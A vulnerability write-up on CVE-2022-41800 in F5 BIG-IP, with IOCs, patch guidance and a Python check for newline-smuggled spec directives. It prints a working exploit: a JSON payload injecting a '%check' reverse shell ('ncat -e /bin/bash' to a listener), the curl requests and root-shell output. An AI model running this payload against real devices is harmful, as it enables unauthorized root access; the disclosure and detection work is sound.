CVE-2022-41800
Description
In all versions of BIG-IP, when running in Appliance mode, an authenticated user assigned the Administrator role may be able to bypass Appliance mode restrictions, utilizing an undisclosed iControl REST endpoint. A successful exploit can allow the attacker to cross a security boundary.
Note: Software versions which have reached End of Technical Support (EoTS) are not evaluated.
Ratings
- Attacker Value: Very High
- Exploitability: Very Low
Technical Analysis
This permits a user who already has an administrator account to create a shell on the target device. There are other (authorized) ways to do this, so this vulnerability is pretty minor, IMO, although if it IS exploited it grants access to a network load balancer which is kind of a big deal.
General Information
Vendors
- f5
Products
- big-ip access policy manager
- big-ip access policy manager 17.0.0
- big-ip advanced firewall manager
- big-ip analytics
- big-ip analytics 17.0.0
- big-ip application acceleration manager
- big-ip application acceleration manager 17.0.0
- big-ip application security manager
- big-ip application security manager 17.0.0
- big-ip domain name system
- big-ip domain name system 17.0.0
- big-ip fraud protection service
- big-ip fraud protection service 17.0.0
- big-ip global traffic manager
- big-ip global traffic manager 17.0.0
- big-ip link controller
- big-ip link controller 17.0.0
- big-ip local traffic manager
- big-ip local traffic manager 17.0.0
- big-ip policy enforcement manager
- big-ip policy enforcement manager 17.0.0
Technical Analysis
Description
On November 16, 2022, F5 released an advisory for F5 Big-IP covering several vulnerabilities, including CVE-2022-41800, which is an authenticated remote code execution vulnerability in the iControl RPC interface.
CVE-2022-41800 requires valid administrative credentials (or an authorization bypass such as CVE-2022-1388) to exploit, as well as network-level access to the management interface, so it is unlikely to see widespread exploitation. We did create a Metasploit module to test your own devices, however.
The affected products are detailed in the vendor’s writeup. We tested these against F5 Big-IP 17.0.0.1.
Technical analysis
F5 Big-IP’s JSON API has an administrator-only endpoint that creates an RPM specification file (.rpmspec) that is consumed by another administrator-only endpoint to create an RPM file. These endpoints are vulnerable to an injection attack into the RPM spec file, where additional fields can be added to the spec using newlines; notably, we can add executable shell commands that run when the resulting RPM file is created. This gives authenticated administrators (who may be malicious insiders, users of compromised accounts, etc.) the ability to run shell commands in an unexpected way.
To demonstrate the vulnerability, we developed this JSON payload:
```json
{
  "specFileData": {
    "name": "test",
    "srcBasePath": "/tmp",
    "version": "test6",
    "release": "test7",
    "description": "test8\n\n%check\nncat -e /bin/bash 10.0.0.179 4444",
    "summary": "test9"
  }
}
```
Note the newlines and %check in the description field, which according to the documentation is typically used to run tests. We send that JSON as part of an authenticated request to /rpm-spec-creator:
```
$ curl -sk -uadmin:Password1 -H "Content-Type: application/json" -X POST https://10.0.0.162/mgmt/shared/iapp/rpm-spec-creator --data '{"specFileData": {"name": "test", "srcBasePath": "/tmp", "version": "test6", "release": "test7", "description": "test8\n\n%check\nncat -e /bin/bash 10.0.0.179 4444", "summary": "test9"}}'
{"specFileData":{"name":"test","srcBasePath":"/tmp","version":"test6","release":"test7","description":"test8\n\n%check\nncat -e /bin/bash 10.0.0.179 4444","summary":"test9","user":"restnoded","group":"restnoded"},"specFilePath":"/var/config/rest/node/tmp/e1816b74-cb67-4c96-b4f0-4be45b0f61a5.spec"}
```
The server responds with a specFilePath containing the spec we created. Here’s what the file looks like on the file system:
```
$ ssh root@10.0.0.162 cat /var/config/rest/node/tmp/e1816b74-cb67-4c96-b4f0-4be45b0f61a5.spec
Summary: test9
Name: test
Version: test6
Release: test7
BuildArch: noarch
Group: Development/Libraries
License: Commercial
Packager: F5 Networks <support@f5.com>

%description
test8

%check
ncat -e /bin/bash 10.0.0.179 4444
[...]
```
We start our listener on the host/port specified in the ncat command:
```
$ nc -v -l -p 4444
Ncat: Version 7.93 ( https://nmap.org/ncat )
Ncat: Listening on :::4444
Ncat: Listening on 0.0.0.0:4444
```
And build the RPM with /build-package (using jq to format the output):
```
$ curl -X POST -sku admin:Password1 https://10.0.0.162/mgmt/shared/iapp/build-package --data '{"state": {}, "appName": "test", "packageDirectory": "/tmp", "specFilePath": "/var/config/rest/node/tmp/e1816b74-cb67-4c96-b4f0-4be45b0f61a5.spec", "force": true }' | jq
{
  "step": "RUN_BUILD_RPM_TASK",
  "packageDirectory": "/tmp",
  "appName": "test",
  "specFilePath": "/var/config/rest/node/tmp/e1816b74-cb67-4c96-b4f0-4be45b0f61a5.spec",
  "force": true,
  "rpmDescription": "Default exported iApp description.",
  "rpmSummary": "Default exported iApp summary.",
  "isSpecFileToCleanUp": false,
  "id": "5de02c7f-ac65-4fa0-8c2b-b541967ce578",
  "status": "CREATED",
  "userReference": {
    "link": "https://localhost/mgmt/shared/authz/users/admin"
  },
  "identityReferences": [
    {
      "link": "https://localhost/mgmt/shared/authz/users/admin"
    }
  ],
  "ownerMachineId": "97163127-c56e-456c-af33-752dec349873",
  "generation": 1,
  "lastUpdateMicros": 1666214391730921,
  "kind": "shared:iapp:build-package:buildrpmtaskstate",
  "selfLink": "https://localhost/mgmt/shared/iapp/build-package/5de02c7f-ac65-4fa0-8c2b-b541967ce578"
}
```
Then verify that we get a root shell on our listener:
```
$ nc -v -l -p 4444
Ncat: Version 7.93 ( https://nmap.org/ncat )
Ncat: Listening on :::4444
Ncat: Listening on 0.0.0.0:4444
Ncat: Connection from 10.0.0.162.
Ncat: Connection from 10.0.0.162:58068.
whoami
root
```
IOCs
When exploiting this vulnerability, two files are potentially created:
- /var/config/rest/node/tmp/<random uuid>.spec
- /var/config/rest/node/tmp/RPMS/noarch/<name>.noarch.rpm
The latter can be prevented if the %check we inject exits with an error code, only creating the .spec file, but that creates a log entry. In our Metasploit module, we remove both files as soon as we obtain a session.
Any access to the pair of RPM endpoints should also be considered suspicious, although they do have benign uses:
- /mgmt/shared/iapp/build-package
- /mgmt/shared/iapp/rpm-spec-creator
Additional files that may log this attack are:
- /var/log/restjavad.*.log contains error messages if the build fails (which doesn’t necessarily happen)
- /var/log/restjavad-audit.*.log is an access log, and will show those endpoints being accessed (which might be benign)
- /var/log/restnoded/restnoded*.log also shows the endpoints being accessed
Guidance
Administrators should patch their F5 Big-IP devices as per the guidance from the vendor. Additionally, organizations should ensure that the management interface for F5 Big-IP is not easily accessible on the network level.
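The root cause described above is that newline characters inside a single specFileData field let the value spill into further spec lines, including section directives such as %check that the RPM build executes. The following is an added example, not Rapid7's module or F5's code: render_spec is a hypothetical reconstruction of the field-per-line layout the page shows on disk, and find_spec_injection is the check a defender would want the endpoint (or a proxy inspecting captured requests) to apply; the payloads are constructed and use a harmless marker command in place of the page's shell.

```python
import re

# RPM spec sections and scriptlets; any of these at the start of a line
# inside a single field value means the value has escaped its field.
SPEC_SECTIONS = {
    "%prep", "%build", "%install", "%check", "%clean", "%files", "%pre",
    "%post", "%preun", "%postun", "%pretrans", "%posttrans", "%description",
    "%package", "%changelog",
}
SECTION_RE = re.compile(r"^\s*(%[a-z]+)\b", re.MULTILINE)

# Constructed payloads using the field names the page shows. The injected
# command is a harmless marker, not the page's reverse shell.
BENIGN = {"name": "test", "srcBasePath": "/tmp", "version": "1", "release": "1",
          "description": "single-line description", "summary": "ok"}
INJECTED = dict(BENIGN, description="test8\n\n%check\nid > /tmp/marker")


def render_spec(spec):
    """Hypothetical reconstruction of how the spec lands on disk, following the
    field-per-line layout shown on the page (not F5's implementation)."""
    lines = [f"Summary: {spec['summary']}", f"Name: {spec['name']}",
             f"Version: {spec['version']}", f"Release: {spec['release']}",
             "BuildArch: noarch", "%description", spec["description"]]
    return "\n".join(lines) + "\n"


def find_spec_injection(spec):
    """Return (field, marker) pairs for every string field that smuggles extra
    spec lines in via an embedded newline; marker is the section directive
    found, or '<newline>' when the value only breaks the line layout."""
    findings = []
    for field, value in spec.items():
        if not isinstance(value, str) or "\n" not in value:
            continue
        directives = [m.group(1) for m in SECTION_RE.finditer(value)
                      if m.group(1) in SPEC_SECTIONS]
        findings.extend((field, d) for d in directives)
        if not directives:
            findings.append((field, "<newline>"))
    return findings


def safe_to_render(spec):
    """Policy a defender would want enforced before writing the spec file:
    refuse any payload whose fields carry a newline at all."""
    return not find_spec_injection(spec)
```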